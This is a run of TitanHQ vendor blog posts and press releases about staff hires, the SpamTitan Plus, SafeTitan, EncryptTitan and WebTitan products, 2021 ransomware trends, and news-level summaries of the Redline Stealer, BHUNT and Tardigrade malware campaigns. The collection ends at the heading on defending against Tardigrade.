Since WebTitan Cloud is a multi-tenant solution, it is also ideal for MSPs looking to add web filtering to their service stacks. MSPs are offered generous margins, the product can be provided in white-label form ready to take their own branding, and a choice of hosting options are available, including hosting within an MSP’s data center.
For more information, contact TitanHQ for more information on DNS-based web filtering with WebTitan Cloud.
It has been a busy 3 months for TitanHQ with two new product launches, a new Channel Chief, and 12 strategic new hires to support the company’s incredible North American growth.
In February 2022, TitanHQ announced Channel veteran, Jeff Benedetti, had been recruited to lead North American sales and the company’s go-to-market efforts in the U.S. and Canada and continue to expand the company’s North American footprint.
Benedetti has almost two decades of successful sales and go-to-market leadership experience in the security and technology markets, with his most recent position being the sales and marketing chief at SKOUT Cybersecurity – which was recently acquired by Barracuda Networks. Benedetti also served as Director of U.S. Sales at Datto, where he significantly increased partner growth and played a key role in Datto’s expansion. While he was at the company, Datto achieved unicorn status and was acquired by Vista Private Equity. In addition to leading the U.S. channel team, Benedetti will oversee the relaunch of the North American TitanHQ partner program in April 2022.
January and February 2022 have seen TitanHQ enjoy incredible growth globally and especially in North America. To support that growth, Benedetti now has a new North American TitanHQ team that includes 12 strategic new hires to service the US and Canadian Managed Service Provider (MSP) market, which will be based at TitanHQ’s new North American base in Shelton, CT.
Like Benedetti, the new hires have extensive channel experience, with that experience gained at companies such as Datto, Skout Cybersecurity, Agile Blue, and Barracuda.
The new hires include:
Director of Channel Development
Eric Morano has 15 years of sales leadership and GTM experience at Datto, Skout Cybersecurity (BarracudaMSP), AgileBlue XDR, CDW, and Verizon. Moreno has been tasked with optimizing TitanHQ’s partner engagement and growth.
Channel Account Managers
Craig Somma has 25 years of technology sales GTM leadership at Tech Dept, Micro Warehouse, and Gov Connection
Joseph Rende has 10+ years of Channel Sales Experience at Gartner and Datto
Pat DeAngelis has 10+ years of MSP technology experience at Datto, Threatlocker, and Armor Cybersecurity
Jeff Brown has 10+ years of sales experience at Datto, SKOUT Cybersecurity, Agile Blue.
Alex De Los Santos has 8 years of sales experience at Datto and ADP,
Alex Nankervis has 8 years of sales experience at Datto and Indeed
Kyle Leyerzapf has 5 years of sales experience at Datto
Patrick Barry has 6 years of sales and accounts experience at Accu-Tech Corporation and Maxim Healthcare
Jamal Ibrahim has 4 years of account management experience at Altium and RCG.
Marc Bonnaci has 7 years of sales and professional experience including Agile Blue.
The New TitanHQ North American Channel Team
In addition to bringing in top talent, TitanHQ has expanded its product portfolio in recent months with the addition of a new anti-phishing solution and security awareness training platform.
In December 2021, TitanHQ launched SpamTitan Plus – A leading-edge AI-driven anti-phishing solution. SpamTitan Plus provides comprehensive “zero-day” threat protection thanks to extensive threat intelligence feeds – More than any of the current market-leading anti-phishing solutions. That translates into a 1.5x increase in unique phishing URL detections and much faster phishing detection speeds – 5 minutes from detection to protecting all users. This new addition to the SpamTitan family has been very well received by IT departments and MSPs.
In February 2022, TitanHQ announced the acquisition of Cyber Risk Aware. The company was formed in 2016 and has grown into a global leader in security awareness training, which targets the human element of cybersecurity. The company’s platform is used to train employees on how to recognize and avoid cyber threats. The platform is an intuitive, real-time security awareness training platform that improves protection against ransomware, malware, BEC, and phishing attacks. The Cyber Risk Aware platform has now been rebranded as SafeTitan and has attracted seismic interest globally from MSPs and IT managers since its launch.
The new product releases, record company growth, highly skilled new channel team, and soon to be relaunched partner program further cement TitanHQ’s position as the leading provider of cloud-based cybersecurity solutions to managed service providers serving the SMB market.
Information about the 2021 ransomware trends identified by U.S. and European cybersecurity agencies and simple steps you can take to improve your security posture and prevent ransomware attacks.
2021 Ransomware Trends
Cybersecurity agencies identified several 2021 ransomware trends that look set to continue throughout 2022. There was an increase in ransomware attacks in 2021 with education and government the most commonly targeted sectors. The pandemic and lockdowns meant businesses needed to switch to remote working and security teams struggled to defend their networks. Ransomware gangs were quick to exploit vulnerabilities to gain access to networks, steal sensitive data, and encrypt files to extort money from businesses.
2021 also saw an increase in sophisticated ransomware attacks on critical infrastructure. Cybersecurity authorities in the United States said cyber threat actors had conducted attacks on 14 of the 16 critical infrastructure sectors, with the UK’s National Cyber Security Centre reporting an increase in attacks on businesses, charities, legal firms, healthcare, and local government.
While initially, several ransomware threat actors were focused on big game hunting – attacking large, high-value organizations that provide critical services such as Colonial Pipeline, Kaseya, and JBS Foods – the attacks prompted the raising of the status of ransomware attacks to the level of terrorism, and the increased scrutiny on ransomware gangs saw ransomware attack trends change, with the focus shifting to mid-sized organizations.
Double extortion tactics have been the norm for the past two years, where attackers exfiltrate data prior to file encryption and then demand payment for the decryption keys and to prevent the publication of stolen data. A new trend of triple extortion in 2021 saw ransomware gangs also threaten to inform the victim’s partners, shareholders and suppliers about the attack. It is also now common for ransomware gangs to work with their rivals and share sensitive data. There have been multiple cases where ransomware gangs have shared information with other gangs to allow them to conduct follow-on attacks.
2021 saw an increase in attacks on the supply chain. By compromising the supply chain, ransomware gangs are able to conduct attacks on multiple targets. There was also an increase in attacks targeting managed service providers, where MSP access to customer networks is exploited to deploy ransomware on multiple targets. Russian ransomware gangs have been increasingly targeting cloud infrastructure, accounts, application programming interfaces, and data backup systems, which has allowed them to steal large quantities of cloud-stored data and prevent access to essential cloud resources.
Diverse tactics were used in 2021 to gain access to victim networks, including quickly developing exploits for known vulnerabilities, conducting brute force attacks on Remote Desktop Protocol, and using stolen credentials. These tactics have proven effective, helped by the increase in remote working and remote schooling due to the pandemic.
Improve Your Defenses Against Ransomware Attacks
To defend against ransomware attacks, it is important to prevent attackers from using these tactics. The number of reported vulnerabilities increased in 2021 and security teams struggled to keep up with routine patching. Security teams need to prioritize patching and concentrate on patching the vulnerabilities that are known to have been exploited, such as those published in the U.S. Cybersecurity and Infrastructure Security Agency’s Known Exploited Vulnerabilities Catalog, and critical vulnerabilities where there is a high change of exploitation.
To combat brute force attacks, it is important to ensure all default passwords are changed and strong passwords are set for all accounts. Consider using a password management solution to make this easier. Multifactor authentication should be set up for as many services as possible, especially for access to critical systems, VPNs, and privileged accounts. RDP, other remote access solutions, and risky services should be closely monitored and ports and protocols that are not being used should be disabled.
It is also vital to take steps to prevent phishing attacks. Phishing is commonly used to gain access to credentials to gain a foothold in networks, or for phishing emails to be used to deliver malware. An advanced email security solution should be implemented to detect and block as many phishing threats as possible to prevent then from being delivered to employee inboxes. A web filtering solution can improve defenses by blocking access to the websites linked in phishing emails and to prevent the downloading of malware from the Internet. Security awareness training for the workforce is also important. Training should raise awareness of the risks of visiting suspicious websites, clicking on suspicious links, and opening suspicious attachments.
TitanHQ can help with all of these anti-phishing defenses through SpamTitan Email Security, the WebTitan DNS-based Web Filter, and SafeTitan Security Awareness Training. To find out more about these solutions for SMBs, enterprises, Internet Service Providers, and Managed Service Providers, give the TitanHQ team a call.
TitanHQ, the leading cybersecurity SaaS business, today announced its acquisition of Cyber Risk Aware. Established in 2016, Cyber Risk Aware is a global leader in security awareness and mitigation of human cyber risk, assisting companies to help their staff protect the company network.
Cyber Risk Aware delivers real-time cyber security awareness training to staff in response to actual staff network behavior. This intuitive and real-time security awareness training reduces the likelihood users will be impacted by the latest threats such as ransomware, BEC attacks, and data breaches, whilst also enabling organizations to meet compliance obligations. Leading global businesses that trust Cyber Risk Aware include Standard Charter, Glen Dimplex, and Invesco.
TitanHQ has been providing email and web security solutions to businesses, enterprises, and managed service providers for more than two decades and now provides a range of security solutions to more than 8,500 businesses globally, including more than 2,500 managed service providers.
The acquisition will further bolster TitanHQ’s already extensive security offering. The combination of intelligent security awareness training with phishing simulation and TitanHQ’s advanced email protection, DNS security, email archiving, and email encryption solutions to create a powerful, multi-layered cybersecurity platform that secures end users from compromise. This is the go-to cybersecurity platform for IT Managed Service Providers and internal IT teams.
“This is a fantastic addition to the TitanHQ team and solution portfolio. It allows us to add a human protection layer to our MSP Security platform, with a fantastic feature-rich solution as demonstrated by the high caliber customers using it. Stephen and his team have built a great company over the years, and we are delighted to have them join the exciting TitanHQ journey.” said TitanHQ CEO Ronan Kavanagh.
The solution is available to both new and existing customers and MSP partners at TitanHQ.com and is now branded as SafeTitan, Security Awareness Training. Cyber Risk Aware existing clients are unaffected and will benefit from improvements in the platform in terms of phishing sims content and an exciting, innovative product roadmap.
Stephen Burke, CEO of Cyber Risk Aware, commented: “I am incredibly proud that Cyber Risk Aware has been acquired by TitanHQ, cybersecurity business that I have greatly admired for a long time. Today’s announcement is fantastic news for both our clients and partners. We will jointly bring together a platform of innovative security solutions that address the #1 threat vector used by bad actors that cause 99% of security breaches, “End User Compromise”. When I first started Cyber Risk Aware, my aim was to be the global security awareness leader in delivering the right message, to the right user at the right time. Now as part of TitanHQ, I am more excited than ever about the unique value proposition we bring to market”.
A campaign has been identified that uses the offer of a free Windows 11 upgrade as a lure to trick people into installing Redline Stealer malware. The Redline Stealer is offered for sale on hacking forums for between $150 and $200 under the malware-as-a-service model. The malware is a popular choice with cybercriminals due to the relatively low cost, ease of use, and the range of sensitive data that the malware can steal.
Redline malware can steal autocomplete data, cryptocurrency, credit card information, FTP and instant messenger credentials, and credentials stored in Chromium-based web browsers. While passwords stored in browsers are encrypted, Redline malware can programmatically decrypt passwords provided the malware runs as the user who was infected. If the user does not store passwords in the browser, the malware can still steal valuable information from browsers, including the sites the user visited and chose not to store a password. Phishing emails can then be crafted targeting those credentials or credential-stuffing attacks could be performed on the accounts for those sites. There have been many cases of Redline malware being installed on endpoints that have antivirus software installed, where the antivirus software has failed to detect and block the malware.
Redline malware is commonly distributed via phishing emails containing an embedded hyperlink to a malicious website, with social engineering tricks used to convince the user to download and run the installer. This approach is often used to target businesses.
Recently, researchers at HP uncovered a campaign that uses a spoofed Microsoft domain offering visitors a free Windows 11 upgrade. The upgrade is offered on the domain windows-upgrade.com, which is a professional-looking domain designed to look like an official Microsoft website. If users click the ‘Download Now’ button, it will trigger the download of a compressed file called Windows11InstallationAssistant.zip, which is downloaded from a Discord CDN.
The zip file contains an executable file called Windows11InstallationAssistant.exe, which will trigger the infection process that will ultimately deliver the Redline stealer payload with no further user interaction required. Now that the domain has been identified as malicious it has been taken down, but the campaign is likely to be relaunched on different domains.
Software installers have long been used for delivering malware, sometimes the installers are fake and only deliver a malicious payload, while others install a genuine application or software but also bundle in malware, spyware, or adware. In the case of the latter, users will likely be unaware that anything untoward has happened, as they will have installed the software they intended to download.
Malicious software installers are often found on peer-2-peer file-sharing networks, legitimate websites that have been compromised, and attacker-owned domains. Search engine poisoning is frequently used to get links to the malicious websites appearing high in the organic search engine listings for key search terms, often those used by businesses. Malicious adverts – malvertising – are often used to send traffic to malicious websites via the third-party ad blocks displayed on legitimate websites. Links to malicious websites may also be added to phishing emails.
While an advanced spam filter can protect against phishing emails containing malicious links, it will do nothing to prevent users from visiting websites hosting malware through web browsing. To protect against web-based attacks, businesses should use a web filter.
A web filter can be used to restrict access to certain categories of website, such as those serving no business purpose. Web filters are fed threat intelligence and use blacklists of known malicious web pages and will prevent access to those web pages or websites. It is also possible to configure a web filter to prevent the downloading of certain file types from the Internet, such as those commonly associated with malware.
Web filters are an important cybersecurity control to add to your arsenal to improve your defenses against malware and ransomware, and they are also effective at blocking the web component of phishing attacks by preventing employees from visiting the websites where credentials are harvested.
TitanHQ has developed an easy-to-use and powerful DNS-based web filter for SMBs, enterprises, and managed service providers. WebTitan Cloud is quick and easy to set up and configure and will allow you to enforce acceptable Internet usage policies and filter out malicious websites in minutes. WebTitan Cloud can protect users of wired and wireless networks, and even remote workers by installing a lightweight client on corporate-owned devices.
If you want to improve your defenses and block more threats, contact TitanHQ for further information on filtering the Internet with WebTitan.
Do you offer Wi-Fi access to your customers? Read on if you do and you are not yet providing a filtered Internet service.
Businesses that offer their customers free Wi-Fi access provide more value and offering free Wi-Fi can help to attract new business. The provision of Wi-Fi does not come at a great cost, and the low cost of providing free WiFi can be easily recovered. Retailers, restaurants, bars, and coffee shops that provide a free Wi-Fi service encourage customers to remain for longer, which can result in more sales. Many people actively seek out businesses that have a free Wi-Fi service. If it was a toss-up between a café with free Wi-Fi and one without, the coffee would have to be considerably better to make up for the lack of Internet access.
Providing Wi-Fi access is however not without risk. If controls are not implemented on the Wi-Fi network to restrict certain online activities, businesses and other public hotspot providers could be exposed to legal risk if their Wi-Fi network is used for illegal activities. Wi-Fi access could also be abused by customers, who could hog bandwidth by downloading large files or using bandwidth-heavy websites, preventing others from accessing the Internet or slowing down page load speeds. Customers could also use the free access for viewing inappropriate web content such as pornography, in full view of other customers. There have been many reports of patrons of libraries doing just that in the United States.
Anyone who uses public Wi-Fi is taking a risk, as public Wi-Fi networks often lack security. There is a risk of a malware infection when connecting, and Internet connections can be monitored, and sensitive information stolen. Cybercriminals often frequent establishments offering free Wi-Fi to prey on the unwary by creating evil twin Wi-Fi networks and eavesdropping on connections.
Businesses offering free Wi-Fi access may not be able to block all types of cyberattack, but they can implement protections to reduce the risk of their customers being harmed. The way to do this is to provide a filtered Internet service.
Businesses that filter the Internet can prevent customers from unwittingly accessing web pages hosting phishing kits and sites known to be used for malware distribution. Internet speed can be kept fast by blocking access to certain types of online activities, especially with a filtering mechanism that allows time-based controls to be implemented. During busy times, access to websites that consume a lot of bandwidth, such as TV and video streaming sites, could be restricted and relaxed at quieter times. Filtering the Internet creates a family-friendly Internet service, which will help to protect minors from coming to harm. A filtered Internet service can attract more business from families especially by signing up for the Friendly Wi-Fi scheme.
It is recommended to block websites promoting hate speech and discrimination, child abuse, drugs, weapons, and pornography to create a sanitized Internet service. Filtering the Internet to block illegal activities such as copyright-infringing file downloads, such as pirated music, videos, and software can reduce legal risk and is also recommended.
As an added advantage, Internet filtering solutions can provide insights into customer behavior. Businesses can get a real-time view of Internet activity, can generate reports of the sites and content that are being accessed, and that can be incredibly valuable for guiding future marketing efforts. If a business can see the sites visited by their customers, they will know the types of sites they should advertise on to get the maximum benefit.
Filtering the Internet is not expensive, but the benefits are considerable. The easiest way of filtering the Internet is to use a DNS filtering solution. DNS filtering solutions can be easily implemented and will not affect Internet speed. They require no hardware purchases, and many implementations filter in the cloud, so require no software downloads.
WebTitan Cloud for Wi-Fi from TitanHQ has been developed to make offering customers a filtered Internet service as simple as possible. Users do not need to be IT experts, as the solution is intuitive and simple to set up, use, and maintain. It requires a simple configuration change, which the TitanHQ support team will talk you through implementing, and you can log in to the web portal and filter categories of Internet content you wish to restrict.
WebTitan Cloud for Wi-Fi is a powerful, feature-rich Internet filtering solution, but for many businesses, it is a set and forget solution. Set your policy and forget about it. Whatever reports or alerts you need can be configured to be sent to you automatically.
If you provide either free or paid Wi-Fi access, and you are not yet offering a filtered Internet service, give the TitanHQ team for more information about WebTitan Cloud for Wi-Fi. A product demonstration can be scheduled if you need it, and you can try the full solution free of charge – with full support – before deciding about a purchase. The team will also be happy to answer any questions you may have about Internet filtering.
TitanHQ is excited to be heading to Threatlocker’s Zero Trust World 2022 in Orlando, Florida this February. The event draws cybersecurity professionals from across the United States and beyond who will gain valuable insights from some of the world’s leading cybersecurity experts that they can take away and apply to better protect their networks and data from the ever-increasing number of cyber threats.
The event runs from February 21-23, 2022 at The Rozen Plaza and attendees will benefit from keynotes explaining the current threat landscape and the importance of Zero Trust in protecting against those threats. There will be discussions about the latest hacking techniques – and how to stop them – and the theme for the final day is to get serious about tackling cyber threats, and attendees will learn about the latest cybersecurity solutions to allow them to level up their cybersecurity stack to better protect against the full range of cyber threats.
There will be live hacking demonstrations, attendees will discover the tools that hackers are successfully using to evade security and attack businesses, and there will be hands-on exercises in workshops, training sessions, and certification labs.
While cybersecurity solutions can certainly help, becoming secure takes planning, analysis, and strategy. Tips and techniques will be provided by some of the leading cybersecurity professionals from around the world, who will talk about the lessons learned from cyberattacks, and the solutions and techniques that have been successfully employed at businesses of all sizes to improve security.
This year, TitanHQ will be exhibiting at the event and will be on hand to explain how TitanHQ’s cybersecurity solutions can be used to improve cybersecurity defenses. TitanHQ has been providing cloud-based cybersecurity solutions to MSPs and SMBs for more than 20 years and today more than 12,000 businesses – including more than 2,500 MSPs – rely on TitanHQ’s cybersecurity solutions to protect against cyber threats: Spamitan Email Security, WebTitan Web Security, EncryptTitan Email Encryption, and ArcTitan Email Archiving.
If you have not yet booked your place at the event, you can register here. Be sure to come and visit the team to discover how TitanHQ solutions can help you grow your business and improve cybersecurity for you and your clients.
Sensitive information is often exposed in email incidents. To avoid reputation damage and financial loss, your business should be encrypting emails.
The Case for Encrypting Emails
Email is extensively used in business and a great deal of sensitive information is sent via email. If that information is exposed it can be a source of embarrassment, but far worse, data exposures can result in significant financial losses and can seriously damage trust and reputation. Emails need to be protected to ensure information contained therein remains confidential and to ensure the integrity of the messages. To do that, businesses need to use encryption technology.
Email transmission is not secure. An email can have four stopovers on its way from the sender to the recipient, and the email can be intercepted at any one point in that journey. Since unencrypted emails are transmitted in plaintext, if they are intercepted, they can be viewed and potentially altered.
According to Radicati research, 320 million emails were sent each day in 2021 and the figure is predicted to rise to 347 million a day next year. Given the high number of transmitted emails, it is perhaps no surprise that the UK’s Information Commissioners Office has reported that email data is the biggest contributor to security incidents.
Those security incidents are a combination of the interception of emails, the hijacking of email accounts, and accidental email exposures, where employees sent emails to the incorrect person. A study by Tessian indicates 58% of employees have sent an email to the wrong person. Email cyberattacks involve phishing to gain access to credentials, the use of credentials obtained in previous data breaches, and the hijacking of the DNS MX record, which is used to direct emails to a web server.
Phishing attacks and email account compromises can be tackled with an advanced spam filter such as SpamTitan, strong password policies, and multifactor authentication. Email hacking and interception can prevent email hijacking, email interception, email tampering, and email exposure through misdirection.
How Does Encrypting Emails Work?
Encrypting emails will ensure that the content of the messages, which includes the message body and any attachments, will be rendered unintelligible from the moment they are sent to them being opened and read by the intended recipient. Email encryption typically works using two layers of encryption, as is the case with EncryptTitan – TitanHQ’s email encryption solution.
An encryption protocol called Transport Layer Security (TLS) is used to prevent interception in transit, such as a man-in-the-middle attack. TLS email encryption is easy to use and does not require any additional steps if TLS-Verify is used. While TLS will protect emails in transit, a second layer of security is needed to ensure end-to-end encryption of the messages. When the message arrives at its intended destination there is the highest risk of being accessed by an unauthorized individual. Therefore, it is important for the recipient to authenticate to decrypt the email, to ensure that only the intended recipient can open the message.
EncryptTitan from TitanHQ
Solutions for encrypting emails need to be robust to ensure message confidentiality, but also easy to use. Solutions such as EncryptTitan have multi-layered security to ensure emails are protected in transit and can only be decrypted by the intended recipient, without making the sending of messages cumbersome, which would have a negative effect on productivity.
EncryptTitan includes Outlook plugins to make encrypting encryption as easy as possible. The security settings will dictate the amount of additional verification that is required, with the highest setting requiring the use of a one-time unique verification code that is delivered through the encryption portal. Not all emails need to be encrypted. When you send an email, if the recipient is not within the company domain, the sender will receive a one-click prompt asking them if they want to encrypt the message.
When encrypting emails, EncryptTitan ensures attachments are also encrypted by default and the Data Loss Protection (DLP) feature scans for certain keywords and will automatically encrypt emails if they contain sensitive data.
EncyptTitan offers sender-defined email expiry dates, after which the email will be deleted from the TitanHQ Secure Portal, and the option of recalling messages if sent to the incorrect recipient. Setup is easy. There is no need to set up on-site hardware, as encryption takes place in the cloud, which makes the solution highly scalable. The solution is also agnostic of the email environment and will work across a wide range of email environments.
If you want to ensure that your company’s emails are protected against interception and tampering, contact TitanHQ for more information about EncryptTitan and to book a free product demonstration. The solution can also be offered as-a-service with ease by managed service providers who want to provide email encrypting services to their clients.
Bitdefender has identified a new stealer malware called BHUNT that allows the attackers to access cryptocurrency wallets and irreversibly transfer funds to wallets under their control.
The continued rise in the value of cryptocurrencies has made cyberattacks on cryptocurrency wallets highly lucrative. Large organizations often use cryptocurrencies to improve business reach, reduce transaction costs, prevent chargeback fraud, and make cross-border transactions much easier. Businesses may hold large amounts of cryptocurrencies, so any attack that gives a hacker access to a business cryptocurrency wallet can result in a significant payday; however, attacks on individuals who hold far smaller amounts of cryptocurrencies are also being conducted. Anyone who holds cryptocurrencies is at risk of an attack.
Malware developers have created several malware variants that are primarily used to access to cryptocurrency wallets, including WeSteal malware, which was first identified in 2020 and is available on underground marketplaces. There are many other malware families that have cryptocurrency stealing capabilities, such as the Redline Stealer, which is now one of the most common malware threats. According to an analysis by the blockchain data platform Chainalysis, cybercriminals stole $14bn (£103bn) in cryptocurrency in 2021 – a 79% increase from the previous year.
BHUNT is a new stealer that targets Exodus, Electrum, Atomic, Jaxx, Ethereum, Bitcoin, and Litecoin wallets, can steal passwords stored in Chrome and Firefox browsers, and captures passwords from the clipboard, although it is a specialized malware for stealing wallet files.
BHUNT is a stealthy cryptocurrency stealer that is heavily encrypted using two virtual machine packers – Themida and VMProtect – which hamper attempts by security researchers to reverse-engineer and analyze the malware. The malware is signed with a digital signature stolen from the CCleaner developer Piriform, although the certificate does not match the binaries, and the malware uses encrypted configuration scripts downloaded from public Pastebin pages. When installed, the malware is injected into explorer.exe.
Five modules have been identified, one is concerned with stealing wallet file contents, another module downloads payloads, one steals passwords from the clipboard and exfiltrates to its C2 server, another is a browser password stealer, and the last module cleans up traces of the infection.
The malware has been used in attacks worldwide, especially in South Asia, the Philippines, and Greece, and appears to be distributed in a similar way to other successful information stealers such as the Redline Stealer, through cracks and product activators such as KMSpico.
To protect against infection with the BHUNT stealer, individuals should not download applications and programs from unofficial repositories and should avoid pirated software, software cracks, and other illegal product activators. Businesses should consider implementing defenses against cryptocurrency stealers such as antivirus software on all endpoints and technical solutions to prevent downloads of executable files.
Cryptocurrency stealers, banking trojans, malware downloaders, spyware, adware, and ransomware are often distributed in fake software and software cracks. While policies can be set that prohibit employees from downloading unauthorized software, those policies are often ignored by employees who download unauthorized software to allow them to work more efficiently.
One of the most effective ways of blocking the downloads of unauthorized and pirated software is to use a web filter. WebTitan can be configured to block access to hacking websites, peer-2-peer file-sharing networks, and other sites where cracks, pirated software, and illegal product activators are available.
WebTitan can also be configured to prevent the downloading of files commonly associated with malware, such as executable files, and controls can be implemented for individual users, user groups, departments, or organization wide.
January 21, 2022, will see the 2nd ever Channel Pitch Livestream Event – An opportunity for forward-thinking managed service providers, Internet service providers, value-added resellers, and IT service providers to discover new software solutions from some of the most existing and innovative technology vendors that can help them grow their business.
The event serves as an introduction to a carefully curated selection of companies that have developed solutions that can help service providers improve protection against cyber threats, manage Microsoft 365 and Azure workloads more effectively, and streamline back-office processes to improve efficiency.
At this year’s event, hosted by Serial Tech Entrepreneur Kevin Lancaster and Channel Evangelist Matt Solomon, attendees will have the opportunity to hear from 7 companies about their MSP solutions, with each presentation lasting only 7 minutes. During those presentations, attendees will learn about the features and benefits of those solutions, and how they can be deployed in MSP environments to grow revenue and improve profitability. After the presentations, attendees will be able to engage directly with any of the vendors to discover more about the solutions, and feedback can be provided to each of the vendors with 100% anonymity.
TitanHQ is proud to be presenting at this Exclusive Livestream MSP event. Conor Madden, TitanHQ Director of Sales, will explain how TitanHQ’s award-winning email security and web security solutions can be used by MSPs, MSSPs, and ISPs to improve protections against the most common threats faced by MSPs and their clients, how the solutions are quick and easy to deploy, effortless to manage, and can help to improve profitability and win new business.
TitanHQ’s solutions have been adopted by more than 3,000 MSPs and are trusted by over 14,500 businesses worldwide to improve email and web security, with the feature-rich solutions offering multiple integrations via the advanced API set, granular policy controls, with a comprehensive suite of reports. The solutions identify more than 100,000 new malware sites every day through threat intelligence delivered from more than 650 million users worldwide.
The Livestream event is free of charge to register and attend and is a great opportunity for MSPs, MSSPs, ISPs, VARs, IT service providers, and consultants.
LiveStream Event Details
Date: January 21, 2022
Time: 4.00 p.m. GMT ¦ 11 a.m. EST ¦ 8 a.m. PST
Hosts: Kevin Lancaster and Matt Solomon
Over the past 4 years, TitanHQ has enjoyed an impressive period of growth, including during the pandemic when many businesses struggled. In addition to building its customer base, TitanHQ has continued to bring in new talent to help drive the business forward. Between September 2020 and April 2021, TitanHQ doubled the size of its workforce and this year released new products to further cement its place as the leading provider of cloud-based cybersecurity solutions to managed service providers serving the SMB market.
TitanHQ’s email security, web security, email archiving, and data encryption solutions are now used by more than 12,000 businesses worldwide to improve their security posture and meet compliance requirements, including Pepsi, O2, Virgin, T-Mobile, and Datto. Among those businesses are over 2,500 managed services providers in 150 countries who use TitanHQ solutions to protect themselves and their customers from cyber threats.
This year, TitanHQ’s growth has been recognized in the 2021 Deloitte Technology Fast 50 Awards, with the company positioned number 33 in the list of Ireland’s fastest-growing technology companies. For the past 22 years, Deloitte has been running the annual awards program to celebrate innovation and entrepreneurship in Ireland’s indigenous technology sector. The list is compiled based on percentage revenue growth over the past 4 years.
In addition to enjoying significant organic year-on-year growth, TitanHQ has also received a significant investment from Livingbridge Investor Group, which has helped to accelerate the company’s ambitious growth plans through investment in people and product development. This month, TitanHQ launched a new spam filtering solution, SpamTitan Plus, which has faster and more comprehensive detection rates of malicious links in emails than any of the current market-leading email security solutions.
“As a result of increased demand globally for our solutions, we have invested heavily in product development and embarked on a recruitment campaign to double our workforce in a program that will allow that growth to continue,” said TitanHQ CEO, Ronan Kavanagh. “The quick move to remote working last year has made us all aware of how important it is to be adaptable and have the right security solutions in place to protect users, customers, company data, and systems.”
In addition to achieving a strong position in the 2021 Deloitte Technology Fast 50 list, TitanHQ was the runner-up in the Scale Up Award, which recognizes the companies that have enjoyed a significant expansion in overseas business over the past four years.
“Congratulations to all of the companies that ranked this year. This is the first year we have seen the impact the pandemic has had on revenues of Irish tech companies,” said David Shanahan, Partner, Deloitte “It will come as no surprise that many of this year’s winners have achieved accelerated growth and scale as a result of the pandemic and being able to capitalize on the global move to a digital way of life.”
TitanHQ are proud to announce the launch of a new solution to protect businesses from increasingly sophisticated phishing threats. SpamTitan Plus builds on the huge success of SpamTitan Gateway and SpamTitan Cloud, which have been adopted by more than 12,000 business customers and over 3,000 Managed Service Providers worldwide.
SpamTitan solutions already provide advanced protection against phishing, malware, viruses, botnets, and ransomware that are delivered via email, with independent tests confirming a high detection and low false-positive rate. SpamTitan Plus takes those protections a step further, with significantly improved coverage, an uplift in phishing link detection, faster detection speeds, and an even lower false-positive rate.
Independent tests have confirmed SpamTitan Plus:
Provides 100% coverage of ALL current market-leading anti-phishing feeds.
Achieves a 1.5x increase in unique phishing URL detections
Has 1.6x faster phishing detections than current market-leading solutions
Is fed 10 million net new, previously undiscovered phishing URLs every single day
Just 5 minutes from initial detection of the malicious URL to protect end users’ mailboxes
Benefits of SpamTitan Plus
According to Deloitte, 91% of all cyberattacks start with a phishing email and despite many businesses providing phishing awareness training to the workforce, many employees still fail to identify phishing emails. Security Affairs says there is a 97% failure rate by employees. Add to that the increasingly sophisticated tactics used by phishers to evade email security solutions and trick end users and it is no surprise that phishing is the number 1 cybersecurity threat faced by businesses.
SpamTitan Plus improves defenses against phishing by blocking more threats before they reach inboxes and ensures that if a phishing email with a malicious link does make it to an inbox, protection is provided at the time an employee clicks the link.
SpamTitan plus provides leading-edge protection through the use of an AI-based system and is fed the latest zero-day threat intelligence. Significant improvements have been made to protect against business email compromise attacks and effectively neutralize malicious links in emails. All links in emails are rewritten and inspected to determine if they are safe and users benefit from time-of-click protection. That means when an individual clicks a link in an email, the content of the landing page is inspected for phishing forms and other malicious content such as spoofed webpages. Redirects are often used by phishers to fool email security solutions that only check the URL stated in the email. SpamTitan Plus protects against this by also following redirects.
Multiple dynamic checks are performed on URLs in real-time, with time-of-click protection ensuring that links included in emails that were benign at the time of delivery – and passed inspection – are detected as malicious if the URLs are weaponized at a later date. For instance, phishing emails may be sent on a Friday with benign links to pass inspection, and the URLs are then updated over the weekend with malicious content added ready for employees returning to work on Monday.
SpamTitan Plus benefits from massive clickstream traffic from 600+ million users and endpoints, which generates 10 million never-before-seen phishing and malicious URLs a day. These unique daily URL additions are powered out of several hundred billion local queries and 100 million cloud queries a day within SpamTitan Plus. The result is faster detection and better protection, with the lowest false positive rate of the market-leading phishing solution providers.
If you run a business or are a managed service provider (MSP) looking to improve phishing protection for your clients, give the TitanHQ team a call to find out more about SpamTitan Plus and how it can significantly improve your defenses against phishing and other email threats.
Biomedical firms and their partners are being targeted by an Advanced Persistent Threat (APT) actor in a campaign that delivers Tardigrade malware. Initial analyses of Tardigrade malware suggest it is a sophisticated threat from the SmokeLoader malware family. SmokeLoader is a generic backdoor that provides threat actors with persistent access to victims’ networks and gives them the ability to download additional modules or other stealthier malware variants onto systems.
Tardigrade malware is a much stealthier and more dangerous malware variant than SmokeLoader. It is far more sophisticated and has greater autonomy. The malware can make decisions about the files to modify and can move laterally within victims’ networks without requiring communication with a command-and-control server. The malware is also capable of immediate privilege escalation to the highest level.
Tardigrade malware is thought to be used for espionage purposes but has far greater capabilities. In addition to exfiltrating sensitive data from pharmaceutical and biomedical firms and vaccine chain companies, the malware is capable of causing major damage to IT systems to disrupt critical processes, including preparing systems for ransomware attacks after sensitive data have been exfiltrated. The analysis of the malware is ongoing, and no specific threat actor has been identified as conducting the attacks, but the attacks are believed to be conducted by a nation-state threat actor.
BIO-ISAC warns of Targeted Attacks on the Biomanufacturing Sector
The Bioeconomy Information Sharing and Analysis Center (BIO-ISAC) has recently issued a warning about Tardigrade malware due to the threat it poses to vaccine manufacturing infrastructure, even though relatively little is currently known about the malware. The early disclosure is believed to be in the public interest.
All firms in the biomanufacturing sector and their partners have been warned that they are likely targets and should assume that attacks will occur. Steps should therefore be taken to ensure that appropriate cybersecurity measures have been implemented to block attacks and limit the damage that can be caused should n attack be successful.
It is too early to tell how many methods are being used to distribute Tardigrade malware, but from the infections detected so far, the APT group behind the attacks is known to be using phishing emails to deliver Tardigrade, with infected file attachments the most likely method of delivery. Hyperlinks in emails that direct individuals to malicious websites where infected files or malware installers are downloaded could also be used.
An analysis of the attacks also indicates the malware could infect USB drives and transfer the malware automatically when those storage devices are used on uninfected computers. That means that if USB drives are used on devices isolated from the network, they too could be infected.
Defending Against Tardigrade Malware
